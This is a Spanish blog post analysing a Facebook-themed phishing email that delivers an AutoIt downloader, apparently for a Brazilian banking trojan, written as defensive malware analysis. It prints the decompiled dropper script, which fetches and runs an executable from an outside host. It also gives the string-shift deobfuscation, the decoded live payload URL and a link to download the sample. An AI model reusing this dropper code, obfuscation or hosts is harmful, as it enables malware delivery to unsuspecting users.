jueves, 13 de noviembre de 2014

Falsa denuncia de Imagen en Facebook.

Ayer se despacharon con una supuesta imagen que fue denunciada por inapropiada en Facebook.
El texto esta en portugués por lo que seguramente se trate, como en otras oportunidades, de un downloader de un troyano bancario brasileño.

Fw: Uma imagem postada em sua linha do tempo foi denunciada!‏

ATENÇÃO: Denúncia de imagem de caráter impróprio constando em sua linha do tempo.




El link descarga un ejecutable


Analizado en V.T. se puede observar un indice muy bajo en detecciones.



El binario esta compilado con Autoit, conteniendo un Script Ofuscado.


Utilizando la herramienta exe2aut llegamos al script que es el siguiente:




#Region
#EndRegion
If FileExists(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")) Then
FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))
EndIf
$urldownloader = chesdvgnqzaltbe("]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ")
$directory = @TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ")
InetGet($urldownloader, $directory)
$m01837778 = Sleep(10000)
$y98384632 = Sleep(10000)
Run($directory)
Sleep(9000)
FileDelete(@TempDir & chesdvgnqzaltbe("Q_hXg^e#ZmZ"))

Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)
Local $ifgewtqghstvbbjs
For $i = 1 To StringLen($plsjkdmhgsfhjksiew)
$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)
Next
Return $ifgewtqghstvbbjs
EndFunc


Vemos que hay cadenas codificadas

]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm
Q_hXg^e#ZmZ


La función chesdvgnqzaltbe es la encargada de decodificar la cadena haciendo una suma de 11 al valor ordinal del carácter.

Func chesdvgnqzaltbe($plsjkdmhgsfhjksiew)
Local $ifgewtqghstvbbjs
For $i = 1 To StringLen($plsjkdmhgsfhjksiew)
$ifgewtqghstvbbjs = $ifgewtqghstvbbjs & Chr(Asc(StringMid($plsjkdmhgsfhjksiew, $i, 1)) + 11)
Next
Return $ifgewtqghstvbbjs


Con un pequeño programa en Python podemos hacer este mismo trabajo.

import string

cadena =']iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#ZmZ';

ca ='';
salida = '';


def sumab(string):
    data = []
    for k in xrange(len(string)):
            se = ord(string[k])
            xx = (se + 11)
            data += [chr(xx)]
    return data


salida = sumab(cadena);


for imprime in range(len(salida)):
    ca = ca + salida[imprime]
print ca


Por lo que las cadenas corresponden a lo siguiente:

]iie/$$Xdbbjc^XVgZ#cZi#ZX$mbageX$XVX]Z$_hXg^e#Zm

http://communicare.net.ec/xmlrpc/cache/jscrip.exe

Q_hXg^e#ZmZ

/jscrip.exe


Lamentablemente para nuestro analisis el sitio donde esta alojado el payload ha excedido el uso del ancho de banda.




Con el analisis dinámico llegamos a lo mismo.

Aquí una captura del trafico de red.



Muestra: https://www.dropbox.com/s/oubxld1jbo2e4f8/facebook%20malware%2012-11-14.rar


Eso es todo por el momento.

@Dkavalanche 2014

No hay comentarios:

Android: BankBot. Hace un tiempo se filtro el fuente de un Bankbo t para android y se masifico bastante, creo que muchos lo han lanzado pa...